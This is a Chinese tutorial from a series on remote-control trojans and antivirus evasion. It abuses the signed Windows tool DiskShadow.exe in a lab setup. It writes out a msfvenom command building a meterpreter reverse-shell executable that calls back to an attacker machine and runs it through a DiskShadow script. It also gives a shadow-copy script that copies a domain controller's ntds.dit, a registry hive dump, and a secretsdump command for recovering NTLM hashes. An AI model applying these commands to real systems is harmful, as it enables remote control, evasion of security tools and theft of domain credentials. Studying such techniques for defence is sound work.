远控免杀专题(58)-白名单DiskShadow.exe执行payload

wholesome

一、DiskShadow简介

diskshadow.exe是一种工具，可公开卷影复制服务（VSS）提供的功能。默认情况下，diskshadow使用类似于diskraid或DiskPart的交互式命令解释器。diskshadow还包括可编写脚本的模式。（详见微软官方文档https://docs.microsoft.com/en-us ... commands/diskshadow）
DiskShadow的代码由微软官方签名，而且Windows Server 2008、Windows Server 2012和Windows Server 2016中都包含了DiskShadow：
​

二、DiskShadow命令执行

交互式命令解释器和脚本模式支持EXEC命令，无论是特权用户还是非特权用户，他们都可以在交互模式下或通过一个脚本文件来调用其他命令以及batch脚本。

• 交互模式：
  
  

使用exec命令调用系统自带的计算器程序
​
​

• 脚本模式：
  
  

使用diskshadow.exe /s 命令调用脚本打开notepad.exe程序
​
需要注意的是，DiskShadow.exe是命令所生成的可执行程序的父进程。除此之外，DiskShadow将会一直运行下去，直到它的子进程终止执行。

三、利用DiskShadow.exe执行

payload法
靶机：Windows server 2008 R2   ip地址：192.168.10.136
攻击机：kali linux               ip地址：192.168.10.130
DiskShadow.exe可以执行exe文件，在这里我们先用msf生成exe格式shellcode：

1. msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=1234 -f exe > ./hacker.exe

复制代码

​
设置msf监听端口：
​
使用diskshadow.exe /s 命令调用脚本打开hacker.exe程序
​

​
攻击机监听到靶机上线：
​
打开杀软，使用diskshadow.exe /s 命令调用脚本打开hacker.exe程序。
360全家桶和火绒均报毒并删除
​
​

四、DiskShadow提取活动目录数据库

前文已经提到diskshadow.exe是一种工具，可公开卷影复制服务（VSS）提供的功能。那么，我们可以来看看卷影复制功能下，是如何来对活动目录数据库ntds.dit进行数据提取的。NTDS.DIT是一个二进制文件，就等同于本地计算机的SAM文件，它的存放位置是%SystemRoot%\ntds\NTDS.DIT，这里面包含的不只是Username和HASH，还有OU、Group等等。
在以下应用中，我们假设活动目录域控制器已被攻击者成功拿下控制，并能有效在特权用户环境中以脚本模式执行DiskShadow命令。首先，我们要准备脚本，我们会先对包含活动目录数据库的目标磁盘驱动器号进行踩点侦测，了解未被系统磁盘使用的驱动器号。以下就是脚本jiaoben.txt的内容：

1. 
   
2. set context persistent nowriters
   
3. add volume c: alias someAlias
   
4. create
   
5. expose %someAlias% z:
   
6. exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
   
7. delete shadows volume %someAlias%

复制代码

reset通过脚本我们创建了一个持久化卷影拷贝，这样就能够执行复制操作并捕捉到目标系统中的敏感文件了。通过监控目标逻辑驱动器，能够确定目标文件的拷贝路径，在删除卷影拷贝之前，将把这个拷贝路径下的文件拷贝到“exfil”目录之中。
注意：我们还可以通过卷影设备名称/唯一标识符来拷贝出我们的目标文件，这种方法的隐蔽性比较高，但是还需要确保目标文件标签/UUID是正确的（通过网络侦察活动确定），否则我们的脚本将无法正常运行，这种技术在交互模式下的可行性更高。
下图给出的是命令执行以及DiskShadow运行的结果：
​

1. type C:\Users\Administrator\Desktop\jiaoben.txt

复制代码

​dir c:\exfil
​
提取目标系统的注册表配置单元（HIVE）信息：

1. reg.exe save hklm\system c:\exfil\system.bak

复制代码

​
此时可以看到文件夹中的ntds.dit和system.bak文件
​
使用脚本SecretsDump.py（下载地址：https://github.com/SecureAuthCorp/impacket），就可以还原出文件中的NTLM哈希

1. secretsdump.py -ntds ntds.dit -system system.bak LOCAL

复制代码

​

五、参考资料

DiskShadow工具介绍:https://www.anquanke.com/post/id/103117